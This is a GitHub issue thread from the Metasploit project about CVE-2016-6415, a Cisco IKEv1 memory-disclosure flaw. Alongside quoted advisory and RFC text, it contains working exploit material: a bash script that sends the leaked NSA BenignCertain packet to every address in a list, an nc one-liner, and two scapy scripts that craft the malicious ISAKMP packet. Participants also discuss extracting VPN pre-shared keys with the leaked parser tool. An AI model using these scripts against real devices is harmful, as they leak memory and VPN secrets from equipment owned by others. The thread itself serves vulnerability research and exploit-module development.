### ISSUE TITLE
[request] Cisco IKEv1 Information Disclosure - CVE-2016-6415

### ISSUE THREAD

**Issue by nixawk** [rapid7/metasploit-framework#7371]
## Introduction

From https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1

> A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
> 
> The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
## Questions

Any body analysis the principle of [CVE-2016-6415](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6415) ?  
- How to generate a evil IKEv1 packet ?
- How to develop a module for the vulnerability ?

Compare the packets between vuln cisco and non-vuln cisco, 

![ikev1-compare](https://cloud.githubusercontent.com/assets/7352479/18903532/5ab41eaa-851f-11e6-8b83-3dbeb4d28475.png)

From RFC2408:

```
  3.5 Proposal Payload

   The Proposal Payload contains information used during Security
   Association negotiation.  The proposal consists of security
   mechanisms, or transforms, to be used to secure the communications
   channel.  Figure 6 shows the format of the Proposal Payload.  A
   description of its use can be found in section 4.2.

                          1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     ! Next Payload  !   RESERVED    !         Payload Length        !
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     !  Proposal #   !  Protocol-Id  !    SPI Size   !# of Transforms!
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     !                        SPI (variable)                         !
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


                 Figure 6:  Proposal Payload Format

   The Proposal Payload fields are defined as follows:

    o  Next Payload (1 octet) - Identifier for the payload type of the
       next payload in the message.  This field MUST only contain the
       value "2" or "0".  If there are additional Proposal payloads in
       the message, then this field will be 2.  If the current Proposal
       payload is the last within the security association proposal,
       then this field will be 0.

    o  RESERVED (1 octet) - Unused, set to 0.

    o  Payload Length (2 octets) - Length in octets of the entire
       Proposal payload, including generic payload header, the Proposal
       payload, and all Transform payloads associated with this
       proposal.  In the event there are multiple proposals with the
       same proposal number (see section 4.2), the Payload Length field
       only applies to the current Proposal payload and not to all
       Proposal payloads.

    o  Proposal # (1 octet) - Identifies the Proposal number for the
       current payload.  A description of the use of this field is found
       in section 4.2.

    o  Protocol-Id (1 octet) - Specifies the protocol identifier for the
       current negotiation.  Examples might include IPSEC ESP, IPSEC AH,
       OSPF, TLS, etc.

    o  SPI Size (1 octet) - Length in octets of the SPI as defined by
       the Protocol-Id.  In the case of ISAKMP, the Initiator and
       Responder cookie pair from the ISAKMP Header is the ISAKMP SPI,
       therefore, the SPI Size is irrelevant and MAY be from zero (0) to
       sixteen (16).  If the SPI Size is non-zero, the content of the
       SPI field MUST be ignored.  If the SPI Size is not a multiple of
       4 octets it will have some impact on the SPI field and the
       alignment of all payloads in the message.  The Domain of
       Interpretation (DOI) will dictate the SPI Size for other
       protocols.

    o  # of Transforms (1 octet) - Specifies the number of transforms
       for the Proposal.  Each of these is contained in a Transform
       payload.

    o  SPI (variable) - The sending entity's SPI. In the event the SPI
       Size is not a multiple of 4 octets, there is no padding applied
       to the payload, however, it can be applied at the end of the
       message.

   The payload type for the Proposal Payload is two (2).
```
## Poc Tool

```
#!/bin/bash

# https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
# https://tools.cisco.com/security/center/selectIOSVersion.x
# https://isakmpscan.shadowserver.org/
# https://twitter.com/marcan42/status/766346343405060096
# https://nmap.org/nsedoc/scripts/ike-version.html
# http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415


function exploit
{

if [ -z "$1" ]; then
  echo "[*] please set a valid ip, ex: 8.8.8.8";
  exit 0;
fi

if [ -z "$2" ]; then
  echo "[*] please set a valid port, ex: 500, 4500"
fi

ip="$1"
port="$2"

echo -e "[*] sending [$payload] -> $ip: $port"
timeout 6s ./bc-id -t $ip -p $port -I "send packet.raw"

}

# UDP port 500
# UDP port 4500, NAT Traversal (NAT-T)
# UDP port 848,  Group Domain of Interpretation (GDOI)
# UDP port 4848, GDOI NAT-T

function main
{
  echo "1) exploit port 500";
  echo "2) exploit port 4500";
  echo "3) exploit port 848";
  echo "4) exploit port 4848";

  read -p "[*] please make a choice: " choice
  read -p "[*] please set a valid iplist: " iplist

  for ip in $(cat $iplist); do
    case $choice in
        1) exploit $ip 500;;
        2) exploit $ip 4500;;
        3) exploit $ip 848;;
        4) exploit $ip 4848;;
    esac
  done
}

main
```
## References
1. [**IKEv1 Information Disclosure Vulnerability in Multiple Cisco Products**](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1)
2. [**RFC2409 - Internet Security Association and Key Management Protocol (ISAKMP)**](https://tools.ietf.org/html/rfc2409)
3. [**RFC2048 - The Internet Key Exchange (IKE)**](https://tools.ietf.org/html/rfc2408)

**Comment by nixawk** [comment]
If any body wants to if your cisco is vulnerable or not, please try:

```
$ nc -v -u xxx.xxx.xxx.xxx 500 < sendpacket.raw
```

download [**sendpacket.raw**](https://github.com/adamcaudill/EquationGroupLeak/blob/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110/sendpacket.raw)

----



## Method 1:

```
#!/usr/bin/python
# -*- coding: utf8 -*-

from scapy.all import *

conf.verb = 0

ip = IP(version=4L,  ihl=5L, tos=0, id=45969, flags=2L, frag=0,
        ttl=64, proto=17, chksum=6510, dst='192.168.1.2',  len=2556)
udp = UDP(sport=500, dport=500, chksum=44523)
data = open('sendpacket.raw').read()
ike = ip/udp/Raw(load=data)
ret = sr1(ike, timeout=6)
```

![cisco-packet](https://cloud.githubusercontent.com/assets/7352479/18941430/b0c01e4a-85d6-11e6-99a5-3095de76fbbf.png)


## Method 2:

```
#!/usr/bin/python
# -*- coding: utf8 -*-

from scapy.all import *


conf.verb = 0

ip = IP(version=4L, ihl=5L, tos=0, id=45969, flags=2L,
        frag=0,  ttl=64, proto=17, chksum=6510,
        dst='192.168.1.2', len=2556)

udp = UDP(sport=500, dport=500, chksum=44523)

payload = 20396253100134839955590145871105245999057984723846808783173121048038033128855006140193565147643421747159198438843766992820332886965751983818860568294022822092251362433622694837826043001608316583527576707042044438580364382096487248541059507446818985500642513618475611407777197742735566862721878599775972579312233189560954764044358213835057135029203876958528467670242908377542113854890955064237782595337737643472503148270367455354851566936724531236181535072776607346589650753219297335520342509733230197332081588627348997458901823720371991768754057464518423660371655310053710888537611608299248941718236203811993553357038205011738633093743296002881113207620215589564823099991549296791407415811373254766203361600970434220427952414837944540719415053375838362805410172715099768729733009914446791375232965581938070480437455373651999657478832870074044688000916000679092615543736127927066803434912330638622027291435280560312208925502373071546027702587080122573843643083680466635605263755583229087149097561691221708936315082064160924823257053383187501969137335363533942044118743901178246139154636584514831901655342756714643027566323578047171872642242365986696519737215031191445662595416309140358461610015278019721634044205457750297606514050310838485558067793210067910686277129345214545164210676780201278273281168049926693721305959233886083264556843050589599965303564162157600098234146643823254406762605209073572962570568563379920882127929994815128341144508580563105391641625427709401944712531513823101394430355610893668273808447111074518778293546714641466064352387720952845608963692825907650567833515929209408820740860038234501383607818788779029538118167192435920965910249649680071556813153804016361688303479412045690552075622208593774209693215196039573049086535214215143598587413642854777162966685189621194355243743212144033037464201979294745963110991803769764535967145986007489229927258295501903978029902933701317012133767228787814066206564818933244602391970277641976701377058357945001970121565722686571950007529660929941407618729639834773849611493348603115411274756672945689591080436905734524794347421637217032918986541186747953709050398293390134684771780197122362338795108374606167337685539011593709646567338496131182720964508957115487444863747120076622292557366201715550420403286957036772965078536940908480393800751186486091078335833823676828366604413841642096183207063256613231232244376625255645679884745398738039626564492227100035675632414257795404708790630796245069771193553655285998717625980113524036870637766049383987325678012570527907784033625206752454819058638333857552274217892933705334341747971833898847912979152351993307434157199284669877607656899394060627052007499351669681642441815673349167370783842690615376084221189884268482570983652455921576910047759877405475501310352617921111919407835733076968342591509609295307677896271191080575491009565019287069944996960458325657467550012010917901553218972122851604455628388504791112226606960281560341497650492126497109442321970600500179114456830046439692304026653087339501359369440706589096856240487805220252765572770535326342355536989344639211405695726452102888152670270496399051676880074980240430547181135516509245952379280829183143602383973770998936611272683771967294900989242482542400652771491229445619479086315165101482179119134542303079394219061141381904352812885663017667766574756449239676258672846685137069410701664675975014903687825171593564229266715147004674131981579418515844262918087972427821072894976611079254042800055940671563289375205283562471819865084415031260244109623689675088784653938550128051870192500749284190921781168736258553303869740592926077703174770495248618150015163805388673975107265925243835061931456023536415088720291565931856153139928851561239873931983004505846210413169046515893999920442518707099879108104752520739010287496005447294846221024164544046890823244895478091960109528131020266168580085122490389870527633888271387246763379971202879685548616686463872144208360882649742779865371474386775648494145465365498822922797088285948399687448746738777977355388203190940802820046441802638574414718245483180711407624277176733061118694635486953256769999727272214858442011442905661150032270162209687177905959732854705456453342531922743836823438589946900572074967422212139462528362017819957186485364583567185042367387154282555169104939854766858380511236053594950306863211910306710182837688662589299399842673222013675674370750518277407980468566994981802027699382077832520599320319426049573183895064823921680059468131803202495035623910868284853697027094109550837687486993467739766527108976852745680152580765058869901973164080864914666389204096627135646685857744653439266326681238860828799158451629860978508981592235957093436217708233509615306952590368429685653356539314305182223972961676929153653209632882056254035779816705248332181509519850215396558613246024296100117062998163534823005972496408362340466145469076763826937750711645379750564298919781347608154344078031597905741437460588893729942056972962195451989516168640564607302845842584420727616775827245334484358542211950717558321208638905603200518308622841947570806017018756565286398749840508286017755578094265247737627168250243785700402211965324094457399553061649905309491697353891164107851366981008321529180997371868496302215839113309824524788853128493655443785172394928062356564931731582513890932793318066947720833181829427350882598100852870139136439810671202929272079480928099778461783002915067917240035781403331681423908677140343770118171068539303744294646338243564596890717177895529948236510102932693408003978437124639350437384904665177926200508418270667175223539085681600778808913655183795011507842386729885724423169893470302842688337116669295586745670380604837511112668290889165327888716779207707170682024453091439271719106813887451733789815400591209831554988211487011820607860273011196586670004510205613918527900349729947363529747795L

isakmp = ISAKMP(init_cookie='>5\xc7\x07)\xdf\xed\xef', resp_cookie='\x00\x00\x00\x00\x00\x00\x00\x00', next_payload=1, version=0x10, exch_type=2, flags=0L, length=2528, id=0)

isakmp_payload_tr = ISAKMP_payload_Transform(next_payload=None, res=0,  length=2476, num=1, id=1,  res2=0,
                                             transforms=[
                                               ('Encryption', 'CAST-CBC'),
                                               ('LifeType', 'Seconds'),
                                               ('LifeDuration', 2147483L),
                                               ('Hash', 'SHA'),
                                               ('GroupDesc', '768MODPgr'),
                                               ('GroupPrime', payload),
                                               ('Authentication', 'PSK')])
isakmp_payload_pl = ISAKMP_payload_Proposal(next_payload=None, res=0, length=2488, proposal=1, proto=1, SPIsize=4, trans_nb=1, SPI='.\xbf\x19<', trans=isakmp_payload_tr)
isakmp_payload_sa = ISAKMP_payload_SA(next_payload=0, res=0, length=2500, DOI=1, situation=1, prop=isakmp_payload_pl)

cisco_ike = ip/udp/isakmp/isakmp_payload_sa
sr1(cisco_ike)
```

**Comment by b0cq** [comment]
anyone have ideas of how to export "preshare key" or decrypt vpn traffic?

**Comment by nixawk** [comment]
From http://arstechnica.com/security/2016/08/cisco-firewall-exploit-shows-how-nsa-decrypted-vpn-traffic/

> BenignCertain exploits a vulnerability in Cisco's implementation of the Internet Key Exchange, a protocol that uses digital certificates to establish a secure connection between two parties. The attack sends maliciously manipulated packets to a vulnerable PIX device. The packets cause the vulnerable device to return a chunk of memory. A parser tool included in the exploit is then able to extract the VPN's pre-shared key and other configuration data out of the response. According to [one of the researchers who helped confirm the exploit](https://twitter.com/int10h), it works remotely on the outside PIX interface. This means that anyone on the Internet can use it. No pre-requirements are necessary to make the exploit work. The researcher provided [this packet capture](http://pastebin.com/HAN4cnPx) to show the end result of the attack.

> ![xorcat-pix-exploit](https://cloud.githubusercontent.com/assets/7352479/19406965/4f8faad0-9258-11e6-8913-f8cd1602a8bd.jpg)

**Comment by bitsscrmabler** [comment]
> Maybe you can try [**bc-parser**](https://github.com/adamcaudill/EquationGroupLeak/blob/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110/bc-parser).
> 
> From http://arstechnica.com/security/2016/08/cisco-firewall-exploit-shows-how-nsa-decrypted-vpn-traffic/
> 
> > BenignCertain exploits a vulnerability in Cisco's implementation of the Internet Key Exchange, a protocol that uses digital certificates to establish a secure connection between two parties. The attack sends maliciously manipulated packets to a vulnerable PIX device. The packets cause the vulnerable device to return a chunk of memory. A parser tool included in the exploit is then able to extract the VPN's pre-shared key and other configuration data out of the response. According to [one of the researchers who helped confirm the exploit](https://twitter.com/int10h), it works remotely on the outside PIX interface. This means that anyone on the Internet can use it. No pre-requirements are necessary to make the exploit work. The researcher provided [this packet capture](http://pastebin.com/HAN4cnPx) to show the end result of the attack.
> > ![xorcat-pix-exploit](https://cloud.githubusercontent.com/assets/7352479/19406965/4f8faad0-9258-11e6-8913-f8cd1602a8bd.jpg)

Hi, 
Did you verify the packet by parsing it with ./bc-parser?
I'm doing so but getting this everytime:

Possible PIX version(s):

	Unknown

Didn't find stack marker - probably not a PIX

**Comment by bcoles** [comment]
I believe this was implemented in #7384.
